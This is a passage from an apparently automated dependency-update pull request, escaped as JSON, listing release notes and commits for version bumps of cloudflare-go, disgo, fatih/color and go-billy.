href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3764\"\u003e#3764\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eworkers: Add new \u003ccode\u003eplacement\u003c/code\u003e attribute object in script upload responses. It contains the \u003ccode\u003emode\u003c/code\u003e and \u003ccode\u003estatus\u003c/code\u003e attributes. (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3825\"\u003e#3825\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eDEPENDENCIES:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003edeps: bumps golang.org/x/net from 0.33.0 to 0.34.0 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3796\"\u003e#3796\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: bumps golang.org/x/time from 0.8.0 to 0.9.0 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3783\"\u003e#3783\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e0.113.0 (January 1st, 2025)\u003c/h2\u003e\n\u003cp\u003eENHANCEMENTS:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eteams_location: make location parameters optional (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3758\"\u003e#3758\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003eDEPENDENCIES:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003edeps: bumps golang.org/x/net from 0.32.0 to 0.33.0 (\u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3756\"\u003e#3756\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cloudflare/cloudflare-go/commit/1eda786b473df9b16e8c229b44fbdca3a6c8d3e7\"\u003e\u003ccode\u003e1eda786\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.md\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cloudflare/cloudflare-go/commit/13174364900eb1293ec6f746ffba1af845193ad2\"\u003e\u003ccode\u003e1317436\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.md for \u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/4189\"\u003e#4189\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cloudflare/cloudflare-go/commit/fd41d6b3ff51b5831c6fba3a87c8f73a3081d0ad\"\u003e\u003ccode\u003efd41d6b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/4189\"\u003e#4189\u003c/a\u003e from GreenStage/aholland/client_secret_version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cloudflare/cloudflare-go/commit/8f93e33214db6db82f34bb4a744e1818c9d6f359\"\u003e\u003ccode\u003e8f93e33\u003c/code\u003e\u003c/a\u003e Bump golangci/golangci-lint-action to fix CI errors\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cloudflare/cloudflare-go/commit/d5bd4b95393c4e156d04c66fd0c82f7de1b3ce79\"\u003e\u003ccode\u003ed5bd4b9\u003c/code\u003e\u003c/a\u003e Add graceful rotation support for client secrets\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cloudflare/cloudflare-go/commit/57714bfbdeea095ec27f4b9bafe65bda4f178d96\"\u003e\u003ccode\u003e57714bf\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.md\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cloudflare/cloudflare-go/commit/b063df7c17d6ddb691e9198e487fe725cd6fd224\"\u003e\u003ccode\u003eb063df7\u003c/code\u003e\u003c/a\u003e generate changelog\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cloudflare/cloudflare-go/commit/46140a1e1a7ed8615e87dc25bcac9025276aefc8\"\u003e\u003ccode\u003e46140a1\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3870\"\u003e#3870\u003c/a\u003e from cloudflare/dependabot/go_modules/github.com/goc...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cloudflare/cloudflare-go/commit/3abb34b01bf318bebc80e53d332c8e2c4f6b5e74\"\u003e\u003ccode\u003e3abb34b\u003c/code\u003e\u003c/a\u003e add CHANGELOG for \u003ca href=\"https://redirect.github.com/cloudflare/cloudflare-go/issues/3870\"\u003e#3870\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/cloudflare/cloudflare-go/commit/c726fce143d9a98280750d2da51fbc47c5f21edd\"\u003e\u003ccode\u003ec726fce\u003c/code\u003e\u003c/a\u003e Bump github.com/goccy/go-json from 0.10.4 to 0.10.5\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/cloudflare/cloudflare-go/compare/v0.104.0...v0.116.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/disgoorg/disgo` from 0.18.5 to 0.19.3\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/disgoorg/disgo/releases\"\u003egithub.com/disgoorg/disgo's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.19.3\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003echore: use separate struct for Invite roles by \u003ca href=\"https://github.com/yokkkoso\"\u003e\u003ccode\u003e@​yokkkoso\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/522\"\u003edisgoorg/disgo#522\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eremove null-padded from udp conn address by \u003ca href=\"https://github.com/iishabakaev\"\u003e\u003ccode\u003e@​iishabakaev\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/521\"\u003edisgoorg/disgo#521\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(voice): gateway bail on non-retriable close codes by \u003ca href=\"https://github.com/MohmmedAshraf\"\u003e\u003ccode\u003e@​MohmmedAshraf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/523\"\u003edisgoorg/disgo#523\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix(voice): add missing voice gateway close event codes by \u003ca href=\"https://github.com/kshitijanurag\"\u003e\u003ccode\u003e@​kshitijanurag\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/524\"\u003edisgoorg/disgo#524\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat(message): shared client themes by \u003ca href=\"https://github.com/kshitijanurag\"\u003e\u003ccode\u003e@​kshitijanurag\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/526\"\u003edisgoorg/disgo#526\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: add \u003ccode\u003eBaseThemeTypeUnset\u003c/code\u003e to \u003ccode\u003eBaseThemeType\u003c/code\u003e enum by \u003ca href=\"https://github.com/kshitijanurag\"\u003e\u003ccode\u003e@​kshitijanurag\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/527\"\u003edisgoorg/disgo#527\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat: guild messages search by \u003ca href=\"https://github.com/kshitijanurag\"\u003e\u003ccode\u003e@​kshitijanurag\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/528\"\u003edisgoorg/disgo#528\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat(discord): add \u003ccode\u003eFileFormatWebP\u003c/code\u003e support to role icon CDN endpoint by \u003ca href=\"https://github.com/kshitijanurag\"\u003e\u003ccode\u003e@​kshitijanurag\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/531\"\u003edisgoorg/disgo#531\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat(discord): add \u003ccode\u003eLocaleSpanishLATAM\u003c/code\u003e by \u003ca href=\"https://github.com/kshitijanurag\"\u003e\u003ccode\u003e@​kshitijanurag\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/532\"\u003edisgoorg/disgo#532\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efeat(rest): add JSON error code \u003ccode\u003e50278\u003c/code\u003e by \u003ca href=\"https://github.com/kshitijanurag\"\u003e\u003ccode\u003e@​kshitijanurag\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/530\"\u003edisgoorg/disgo#530\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003erefactor: rename duplicate JSON error code by \u003ca href=\"https://github.com/kshitijanurag\"\u003e\u003ccode\u003e@​kshitijanurag\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/533\"\u003edisgoorg/disgo#533\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/iishabakaev\"\u003e\u003ccode\u003e@​iishabakaev\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/521\"\u003edisgoorg/disgo#521\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/MohmmedAshraf\"\u003e\u003ccode\u003e@​MohmmedAshraf\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/523\"\u003edisgoorg/disgo#523\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/kshitijanurag\"\u003e\u003ccode\u003e@​kshitijanurag\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/524\"\u003edisgoorg/disgo#524\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/disgoorg/disgo/compare/v0.19.2...v0.19.3\"\u003ehttps://github.com/disgoorg/disgo/compare/v0.19.2...v0.19.3\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.19.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efix(component): update field name from 'value' to 'values' in CheckboxGroupComponent by \u003ca href=\"https://github.com/ikafly144\"\u003e\u003ccode\u003e@​ikafly144\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/517\"\u003edisgoorg/disgo#517\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/disgoorg/disgo/compare/v0.19.1...v0.19.2\"\u003ehttps://github.com/disgoorg/disgo/compare/v0.19.1...v0.19.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003ev0.19.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003efeat: new RadioGroupComponent, CheckboxGroupComponent \u0026amp; CheckboxComponent by \u003ca href=\"https://github.com/topi314\"\u003e\u003ccode\u003e@​topi314\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/510\"\u003edisgoorg/disgo#510\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/disgoorg/disgo/compare/v0.19.0...v0.19.1\"\u003ehttps://github.com/disgoorg/disgo/compare/v0.19.0...v0.19.1\u003c/a\u003e\u003c/p\u003e\n\u003ch1\u003ev0.19.0\u003c/h1\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!NOTE]\nThis release includes support \u003ca href=\"https://daveprotocol.com/\"\u003eDAVE\u003c/a\u003e (E2EE voice) which will be required for all voice connections starting on March 1st 2026.\nIf you need help or found issues with our implementation please reach out to us via GitHub issues/discussions or our support server (see README.md for invite link).\nFor a basic example see: \u003ca href=\"https://github.com/disgoorg/disgo/blob/v0.19.0/_examples/voice/main.go\"\u003ehttps://github.com/disgoorg/disgo/blob/v0.19.0/_examples/voice/main.go\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!WARNING]\nThis release includes breaking changes. Please review the \u003ca href=\"https://github.com/disgoorg/disgo/blob/HEAD/#breaking-changes\"\u003eBreaking Changes\u003c/a\u003e section below for details.\nIf you need help migrating please reach out to us via GitHub discussions or our support server (see README.md for invite link).\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003ch3\u003eAdded\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for AVIF emojis by \u003ca href=\"https://github.com/sebm253\"\u003e\u003ccode\u003e@​sebm253\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/disgoorg/disgo/pull/456\"\u003edisgoorg/disgo#456\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/disgoorg/disgo/commit/b764859a02a147e4a3c7b1e43c0fd5d6705feeee\"\u003e\u003ccode\u003eb764859\u003c/code\u003e\u003c/a\u003e refactor: rename duplicate JSON error code (\u003ca href=\"https://redirect.github.com/disgoorg/disgo/issues/533\"\u003e#533\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/disgoorg/disgo/commit/247294c30138b4cf62b755aa090c0e6f8c764ba3\"\u003e\u003ccode\u003e247294c\u003c/code\u003e\u003c/a\u003e feat(rest): add JSON error code \u003ccode\u003e50278\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/disgoorg/disgo/issues/530\"\u003e#530\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/disgoorg/disgo/commit/c6d4d9a72a779daa50c365a9ff87083ebf03a21d\"\u003e\u003ccode\u003ec6d4d9a\u003c/code\u003e\u003c/a\u003e feat(discord): add \u003ccode\u003eLocaleSpanishLATAM\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/disgoorg/disgo/issues/532\"\u003e#532\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/disgoorg/disgo/commit/2fbf502bef92fe40a86c240608b751a2f7727ac1\"\u003e\u003ccode\u003e2fbf502\u003c/code\u003e\u003c/a\u003e feat(discord): add \u003ccode\u003eFileFormatWebP\u003c/code\u003e support to role icon CDN endpoint (\u003ca href=\"https://redirect.github.com/disgoorg/disgo/issues/531\"\u003e#531\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/disgoorg/disgo/commit/4c8775e6d2e69b0f8e0977d89469e1343d120070\"\u003e\u003ccode\u003e4c8775e\u003c/code\u003e\u003c/a\u003e feat: guild messages search (\u003ca href=\"https://redirect.github.com/disgoorg/disgo/issues/528\"\u003e#528\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/disgoorg/disgo/commit/dd3528ae9dd09c56cac59cfbc4e9adf1565bc263\"\u003e\u003ccode\u003edd3528a\u003c/code\u003e\u003c/a\u003e enable gosec linter \u0026amp; fix issues\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/disgoorg/disgo/commit/90539336e6a69be898ab428cbfa9fe4c3b2a00d3\"\u003e\u003ccode\u003e9053933\u003c/code\u003e\u003c/a\u003e chore: gofumpt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/disgoorg/disgo/commit/6c014ea98858dd7981e0097108ab85ef9bf66c61\"\u003e\u003ccode\u003e6c014ea\u003c/code\u003e\u003c/a\u003e update actions\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/disgoorg/disgo/commit/45163fa0411bc23151da437e751a42f328ae4d7b\"\u003e\u003ccode\u003e45163fa\u003c/code\u003e\u003c/a\u003e gofmt\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/disgoorg/disgo/commit/d5d4fbe3873f8c969dc65a1391d035e320b30f23\"\u003e\u003ccode\u003ed5d4fbe\u003c/code\u003e\u003c/a\u003e Fix some lints from golangci-lint\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/disgoorg/disgo/compare/v0.18.5...v0.19.3\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/fatih/color` from 1.18.0 to 1.19.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/fatih/color/releases\"\u003egithub.com/fatih/color's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev1.19.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBump golang.org/x/sys from 0.25.0 to 0.28.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fatih/color/pull/246\"\u003efatih/color#246\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eFix for issue \u003ca href=\"https://redirect.github.com/fatih/color/issues/230\"\u003e#230\u003c/a\u003e set/unsetwriter symmetric wrt color support detection by \u003ca href=\"https://github.com/ataypamart\"\u003e\u003ccode\u003e@​ataypamart\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fatih/color/pull/243\"\u003efatih/color#243\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore: go mod cleanup by \u003ca href=\"https://github.com/sashamelentyev\"\u003e\u003ccode\u003e@​sashamelentyev\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fatih/color/pull/244\"\u003efatih/color#244\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/sys from 0.28.0 to 0.30.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fatih/color/pull/249\"\u003efatih/color#249\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump github.com/mattn/go-colorable from 0.1.13 to 0.1.14 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fatih/color/pull/248\"\u003efatih/color#248\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eUpdate CI and go deps by \u003ca href=\"https://github.com/fatih\"\u003e\u003ccode\u003e@​fatih\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fatih/color/pull/254\"\u003efatih/color#254\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/sys from 0.31.0 to 0.37.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fatih/color/pull/268\"\u003efatih/color#268\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: include escape codes in byte counts from \u003ccode\u003eFprint\u003c/code\u003e, \u003ccode\u003eFprintf\u003c/code\u003e by \u003ca href=\"https://github.com/qualidafial\"\u003e\u003ccode\u003e@​qualidafial\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fatih/color/pull/282\"\u003efatih/color#282\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump golang.org/x/sys from 0.37.0 to 0.40.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fatih/color/pull/277\"\u003efatih/color#277\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003efix: add nil check for os.Stdout to prevent panic on Windows services by \u003ca href=\"https://github.com/majiayu000\"\u003e\u003ccode\u003e@​majiayu000\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fatih/color/pull/275\"\u003efatih/color#275\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump dominikh/staticcheck-action from 1.3.1 to 1.4.0 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fatih/color/pull/259\"\u003efatih/color#259\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump actions/checkout from 4 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fatih/color/pull/273\"\u003efatih/color#273\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eOptimize Color.Equals performance (O(n²) → O(n)) by \u003ca href=\"https://github.com/UnSubble\"\u003e\u003ccode\u003e@​UnSubble\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/fatih/color/pull/269\"\u003efatih/color#269\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBump actions/setup-go from 5 to 6 by \u003ca href=\"https://github.com/dependabot\"\u003e\u003ccode\u003e@​dependabot\u003c/code\u003e\u003c/a\u003e[bot] in \u003ca href=\"https://redirect.github.com/fatih/color/pull/266\"\u003efatih/color#266\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eNew Contributors\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ataypamart\"\u003e\u003ccode\u003e@​ataypamart\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/fatih/color/pull/243\"\u003efatih/color#243\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/sashamelentyev\"\u003e\u003ccode\u003e@​sashamelentyev\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/fatih/color/pull/244\"\u003efatih/color#244\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/qualidafial\"\u003e\u003ccode\u003e@​qualidafial\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/fatih/color/pull/282\"\u003efatih/color#282\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/majiayu000\"\u003e\u003ccode\u003e@​majiayu000\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/fatih/color/pull/275\"\u003efatih/color#275\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/UnSubble\"\u003e\u003ccode\u003e@​UnSubble\u003c/code\u003e\u003c/a\u003e made their first contribution in \u003ca href=\"https://redirect.github.com/fatih/color/pull/269\"\u003efatih/color#269\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/fatih/color/compare/v1.18.0...v1.19.0\"\u003ehttps://github.com/fatih/color/compare/v1.18.0...v1.19.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fatih/color/commit/ca25f6e17f118a5a259f3c2c0d395949d1103a5a\"\u003e\u003ccode\u003eca25f6e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/fatih/color/issues/266\"\u003e#266\u003c/a\u003e from fatih/dependabot/github_actions/actions/setup-go-6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fatih/color/commit/120598440a16510564204450092d1e7925fad9ae\"\u003e\u003ccode\u003e1205984\u003c/code\u003e\u003c/a\u003e Bump actions/setup-go from 5 to 6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fatih/color/commit/5715c20323d8c79f60d4944831fcfa3b76cd5734\"\u003e\u003ccode\u003e5715c20\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/fatih/color/issues/269\"\u003e#269\u003c/a\u003e from UnSubble/main\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fatih/color/commit/2f6e2003760028129f34c4ad5c3728b904811d3c\"\u003e\u003ccode\u003e2f6e200\u003c/code\u003e\u003c/a\u003e Merge branch 'main' into main\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fatih/color/commit/f72ec947d0c34504dfd08b0db68d89f37503fc90\"\u003e\u003ccode\u003ef72ec94\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/fatih/color/issues/273\"\u003e#273\u003c/a\u003e from fatih/dependabot/github_actions/actions/checkout-6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fatih/color/commit/848e6330af5690fa24bb038d5330839a33f1f0e5\"\u003e\u003ccode\u003e848e633\u003c/code\u003e\u003c/a\u003e Merge branch 'main' into main\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fatih/color/commit/4c2cd3443934693bd8892fc0f7bb5bbec8e3788a\"\u003e\u003ccode\u003e4c2cd34\u003c/code\u003e\u003c/a\u003e Add tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fatih/color/commit/7f812f029c41eddd3ac7fbbdf6cc78e4b175944b\"\u003e\u003ccode\u003e7f812f0\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4 to 6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fatih/color/commit/b7fc9f9557629556aff702751b5268cefcbafa15\"\u003e\u003ccode\u003eb7fc9f9\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/fatih/color/issues/259\"\u003e#259\u003c/a\u003e from fatih/dependabot/github_actions/dominikh/staticc...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fatih/color/commit/239a88f715e8e35f40492da7a1e08f7173e78e05\"\u003e\u003ccode\u003e239a88f\u003c/code\u003e\u003c/a\u003e Bump dominikh/staticcheck-action from 1.3.1 to 1.4.0\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/fatih/color/compare/v1.18.0...v1.19.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `github.com/go-git/go-billy/v5` from 5.8.0 to 5.9.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/go-git/go-billy/releases\"\u003egithub.com/go-git/go-billy/v5's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.9.0\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUse path.Clean instead of filepath.Clean in iofs.Open by \u003ca href=\"https://github.com/puerco\"\u003e\u003ccode\u003e@​puerco\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-billy/pull/197\"\u003ego-git/go-billy#197\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eDeprecate ChrootOS in favour of BoundOS by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-billy/pull/201\"\u003ego-git/go-billy#201\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eGeneral Improvements by \u003ca href=\"https://github.com/pjbgf\"\u003e\u003ccode\u003e@​pjbgf\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/go-git/go-billy/pull/203\"\u003ego-git/go-billy#203\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eosfs: ChrootOS eval 